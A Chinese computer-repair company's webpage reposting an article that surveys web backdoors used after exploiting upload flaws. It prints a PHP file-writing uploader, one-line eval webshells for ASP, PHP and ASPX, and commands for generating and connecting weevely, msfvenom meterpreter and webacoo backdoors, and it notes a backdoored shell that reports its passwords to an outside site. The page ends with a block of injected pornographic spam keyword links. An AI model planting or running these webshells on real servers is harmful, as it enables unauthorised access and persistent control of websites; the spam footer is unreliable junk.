錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
[安全]解析常見的Web后門應用方法

作者: 佚名  日期:2017-04-14 12:45:24   來源: 本站整理

 在對一個web站點進行滲透測試的滲透攻擊階段,一般會想辦法突破上傳限制,向目標可執行目錄中寫入一個帶有攻擊性質的腳本來協助獲取更大的服務器權限。
這里我們就一起來盤點一下常用的web后門吧
大馬與小馬
在幾年前很流行的網站入侵打油詩中有寫
  進谷歌 找注入
  沒注入 就旁注
  沒旁注 用0day
  沒0day 猜目錄
  沒目錄 就嗅探
  爆賬戶 找后臺
  傳小馬 放大馬
  拿權限 掛頁面
  放暗鏈 清數據
  清日志 留后門
其中的傳小馬上大馬就是我們要說的小馬大馬了,小馬的功能一般都比較單一,作用一般是向服務器中寫入文件數據。因為其功能單一的特性,隱蔽性通常都比較高。有些網站對上傳文件大小做了限制,小馬因為占用空間也小也能繞過這些限制
這里貼一個php小馬
 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
form method="POST"> 
保存文件名: input type="text" name="file" size="60" value=" echo str_replace('\\','/',__FILE__) ?>"> 
br>br> 
textarea name="text" COLS="70" ROWS="18" >textarea> 
br>br> 
input type="submit" name="submit" value="保存"> 
form> 
 
if(isset($_POST['file'])) 

$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失敗!'; 
@fclose($fp); 

?>
大馬一般就提供了更多的功能,例如輔助提權,執行sql語句,反彈shell等。
不過網上很多的大馬都加了后門,例如圖中的這款從mumaasp.com這個網站下載的一款大馬會將木馬的地址和密碼提交到http://www.mumaasp.com/xz/sx.asp這個網址

中國菜刀

中國菜刀和一句話木馬想必是大家最熟悉的了,中國菜刀支持asp、php、asp.net和jsp等web編程語言,小巧的中國菜刀還自帶了很多實用的功能。例如虛擬終端

還有例如安全掃描,定時鬧鐘,數據庫管理等功能,甚至內置了一個網頁瀏覽器
使用方法也很簡單,就是往目標web服務器上傳相應的一句話木馬
asp一句話木馬:
"pass"))%>
php一句話木馬:
 @eval($_POST[pass]);?>
aspx一句話木馬:
%@ Page Language="Jscript"%>
%eval(Request.Item["pass"])%>
網上也有很多仿冒中國菜刀的官網發布加了后門的中國菜刀
在linux下也有很多替代中國菜刀的開源產品,例如中國蟻劍和C刀
weevely
在kali linux中,我們用的比較多的就是這款php后門管理工具 weevely了。weevely支持的功能很強大,使用http頭進行指令傳輸。唯一的缺陷就是只支持php

我們通過幫助可以看到,weevely的使用還是很簡單的,首先我們在/root目錄下生成一個名為weevely.php密碼為123的backdoor agent
weevely generate 123 /root/weevely.php
然后我們只要上傳到目標服務器之后運行
weevely  就能成功連接上了

metasploit
metasploit框架中其實也自帶了php的后門,并且配合meterpreter功能強大
在這里提一下正向連接和反向連接(bind_tcp reverse_tcp)
bind_tcp:在這里黑客主動去連接目標主機,就叫作正向連接。適用的情況是服務器在外網的情況
reverse_tcp:在這個例子中反向連接就是被入侵的主機反過來來連接黑客,就叫作反向連接,在目標服務器在內網或有防火墻的情況下使用。
msfvenom -p php/meterpreter/bind_tcp lhost=172.24.3.20 lport=4444 -o /root/msf.php
其中lhost為目標服務器的地址 lport是目標服務器會開放的端口 -o后面是后門輸出的路徑
然后進入msfconsole

xu
選擇exploit/multi/handler這個模塊
然后設置payload為php/meterpreter/bind_tcp
最后設置一下目標的ip然后輸入run開始監聽
觸發木馬的方法就是訪問后門的網址

然后msfconsole如果有連接信息說明已經連接成功


使用方式可以參考meterpreter
參考鏈接](http://www.evil0x.com/posts/838.html
webacoo
webacoo是用base64編碼后隱藏在Cookie頭中,隱蔽性較強,webacoo的缺點是不能指定密碼,所以。。。不推薦作為持續性攻擊的權限維持的選擇
webacoo -g -o /root/webacoo.php
生成webacoo.php存放在/root目錄下

上傳成功之后用命令
webacoo -t -u 來連接

成功后會生成一個仿真終端,可以使用load命令來加載模塊,之后可以進行上傳下載,連接數據庫等操作。只是不能設置密碼是個硬傷。
 



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 无码精品尤物一区二区三区| 欧洲成人午夜精品无码区久久| 久久久无码精品亚洲日韩蜜臀浪潮| 熟妇人妻系列av无码一区二区| 中文字幕AV中文字无码亚| 无码国内精品久久综合88| 中文成人无码精品久久久不卡 | 无码AV岛国片在线播放| 精品深夜AV无码一区二区老年| 亚洲人成无码久久电影网站| 精品无码一区二区三区爱欲九九| 免费A级毛片无码久久版| 久久国产亚洲精品无码| 成人无码视频97免费| 国产一区二区三区无码免费| 精品久久久久久无码不卡| 日韩av无码中文字幕| 亚洲爆乳精品无码一区二区三区| 国产精品JIZZ在线观看无码| 无码丰满熟妇一区二区| 啊灬啊别停灬用力啊无码视频| 亚洲av无码成h人动漫无遮挡| 亚洲日韩精品A∨片无码| 国产成人无码专区| 国产精品无码国模私拍视频| 无码人妻精品一区二区三区久久久| 亚欧免费无码aⅴ在线观看| 亚洲国产成人精品无码区在线观看| 国产精品一级毛片无码视频| 无码粉嫩虎白一线天在线观看| 亚洲一区二区三区无码国产| 人妻丰满熟妞av无码区| 久久亚洲精品无码aⅴ大香| 久久久久久人妻无码| 一本一道VS无码中文字幕| 亚洲av无码专区在线电影| 加勒比无码一区二区三区| 免费无码国产V片在线观看| 亚洲高清无码综合性爱视频| 自拍偷在线精品自拍偷无码专区| 亚洲日韩激情无码一区|